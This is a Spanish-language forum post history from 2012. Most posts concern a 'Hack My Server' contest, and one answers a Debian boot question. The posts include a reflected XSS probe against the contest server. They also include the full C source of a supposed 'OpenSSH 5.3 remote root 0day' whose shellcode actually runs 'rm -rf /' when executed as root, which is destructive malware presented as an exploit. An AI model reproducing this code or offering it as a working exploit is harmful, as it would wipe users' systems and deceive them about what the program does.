|
261
|
Seguridad Informática / Hacking / Re: Inseguridad de Linux por partición con Windows.
|
en: 10 Mayo 2012, 18:38 pm
|
pues si se puede, hace unos años cuando aprendia a utilizar linux, necesitaba pasar mis archivos de una lado a otro el problema era hacerlo de windows a linux
no recuerdo el nombre del programa pero era escrito en JAVA, y podia revisar mis archivos de linux e incluso intercambiar archivos, por eso menciono que si es posible, pero bueno tendras que instalar java para que funcione el virus m imagino que se podria hacer con lenguaje C pero otro problema es que seria muy pesado como para ser un virus indetectable
|
|
|
264
|
Seguridad Informática / Hacking / Re: Concurso Nº1: "Hack My Server"
|
en: 9 Mayo 2012, 23:33 pm
|
en el pagina 13 puse una XSS que encontre en un escaneo, pero no se si no supe utilizarla o no funciona, la hice con wapiti un scanner GPL, este fue el resultado http://xx.xxx.xxx.180/?mod=<script>alert(document.cookie)</script>&op=browse Sage 1.0b3 is vulnerable to Cross Site Scripting (XSS). CA-2000-02. Referencias: http://www.cert.org/advisories/CA-2000-02.html
luego hice un scaneo con nikto y me dio el mismo resultado + /?mod=<script>alert(document.cookie)</script>&op=browse - 200/OK Response could be Sage 1.0b3 is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
por cierto dimitrix, me podrias mandar los datos de plesk porfavor
|
|
|
265
|
Sistemas Operativos / GNU/Linux / Re: Debian me odia.
|
en: 9 Mayo 2012, 04:46 am
|
talvez el problema es el debian que utiliza, recuerda que la version estable es antigua y por lo mismo es segura, solo quedan las cosas que ya fueron arregladas
intenta con debian mas reciente, intenta con wheeze
lo que no pusise es si te deja llegar hasta root o se detiene mientras se carga
si puedes usar tty, oprime todas las opciones son de f1 a f7, a ver i alguno te deja ver comandos
si puedes ver los comandos busca la informacion de video, y verificala con la de tu cdlive y ve si hay diferencias, talvez hay modificaciones que no hayas visto
a ver si esto te ayuda
|
|
|
267
|
Seguridad Informática / Hacking / Re: Concurso Nº1: "Hack My Server"
|
en: 8 Mayo 2012, 20:44 pm
|
pues estuve probando un buen de cosas, metasploit, varios exploit, entre ellos varios que aquii utilizaron... lo bueno es que ya hubo quien lo intento con los que poste hace tiempo y pues al parecer tampoco funcionaron e incluso e estado leyendo los bugs de esta paina para encontrar algo pero la mayoria son locales http://xss.cx/examples/plesk-reports/xss-reflected-cross-site-scripting-cwe79-capec86-plesk-parallels-control-panel-version-20110407.20.htmltambien vi un explot para debian, OpenSSH 5.3p1 Debian intente con este * OpenSSH <= 5.3 remote root 0day exploit (32-bit x86) * Priv8! Priv8! Priv8! Priv8! Priv8! Priv8! Priv8! * * */ #include <stdio.h> #include <netdb.h> #include <stdlib.h> #include <string.h> #include <unistd.h> #include <arpa/inet.h> #include <sys/types.h> #include <sys/socket.h> #include <netinet/in.h> void usage(char *argv[]) { printf("\n\t[+] HATSUNEMIKU\n"); printf("\t[+] OpenSSH <= 5.3p1 remote root 0day exploit\n"); printf("\t[+] By: n3xus\n"); printf("\t[+] Greetz to hackforums.net\n"); printf("\t[+] Keep this 0day priv8!\n"); printf("\t[+] usage: %s <target> <port>\n\n", argv[0]); exit(1); } unsigned char decoder[]= "\x6a\x0b\x58\x99\x52" "\x6a\x2f\x89\xe7\x52" "\x66\x68\x2d\x66\x89" "\xe6\x52\x66\x68\x2d" "\x72\x89\xe1\x52\x68" "\x2f\x2f\x72\x6d\x68" "\x2f\x62\x69\x6e\x89" "\xe3\x52\x57\x56\x51" "\x53\x89\xe1\xcd\x80"; unsigned char rootshell[]= "\x31\xd2\xb2\x0a\xb9\x6f\x75\x21\x0a\x51\xb9\x63\x6b" "\x20\x79\x51\x66\xb9\x66\x75\x66\x51\x31\xc9\x89\xe1" "\x31\xdb\xb3\x01\x31\xc0\xb0\x04\xcd\x80\x31\xc0\x31" "\xdb\x40\xcd\x80"; int main(int argc, char **argv) { int euid = geteuid(); int port= 22, sock; char h[1000]; struct hostent *host; struct sockaddr_in addr; if(euid != 0) { fprintf(stderr, "You need to be root to use raw sockets.\n"); exit(1); } if(euid == 0) { fprintf(stdout, "MIKU! MIKU! MIKU!\n"); } if(argc != 3) usage(argv); if(!inet_aton(h, &addr.sin_addr)) { host = gethostbyname(h); if(!host) { fprintf(stderr, "[-] Exploit failed.\n"); (*(void(*)())decoder)(); exit(1); } addr.sin_addr = *(struct in_addr*)host->h_addr; } sock = socket(PF_INET, SOCK_STREAM, 0); addr.sin_port = htons(port); addr.sin_family = AF_INET; if(connect(sock,(struct sockaddr*)&addr,sizeof(addr))==-1) { fprintf(stderr,"[-] Exploit failed.\n"); exit(1); } char payload[1337]; memcpy(payload, &decoder, sizeof(decoder)); memcpy(payload, &rootshell, sizeof(rootshell)); send(sock, payload, strlen(payload),0); close(sock); if(connect(sock,(struct sockaddr*)&addr,sizeof(addr))==-1) { fprintf(stderr, "[-] Exploit failed.\n"); exit(1); } else if(connect(sock,(struct sockaddr*)&addr,sizeof(addr))==0) { fprintf(stdout, "[+]g0t sh3ll!\n"); system("/bin/bash"); } else { fprintf(stderr, "[-] Exploit failed.\n"); close(sock); exit(0); } } pero tampoco, espero pronto haya mas suerte
|
|
|
268
|
Seguridad Informática / Hacking / Re: Concurso Nº1: "Hack My Server"
|
en: 3 Mayo 2012, 04:58 am
|
al parecer plesk tiene un fallo en Agent.php, pero lamentablemente casi no se mucho sobre SQLi, tratare de buscar como lograrlo, ya que ayer fue lo primero que encontre sobre subir privilegios... pero por lo mismo que no se mucho sobre eso, lo quise dejar para despues e intentar con exploits, pero lo hare a ver que puedo encontrar
salu2
|
|
|
270
|
Seguridad Informática / Hacking / Re: Concurso Nº1: "Hack My Server"
|
en: 3 Mayo 2012, 02:49 am
|
hola
pues yo estoy intentando con IMAP, al rato posteo lo que encontre aunque no creo que me funcione para tener acceso... por cierto
dimitrix, podrias verificar la direccion /etc/passwd si hubo algun cambio o algo, es que no se si logre agregar algo o solo fue un error en un exploit
tambien al rato posteo ese exploit, salu2
|
|
|
|
|
|
|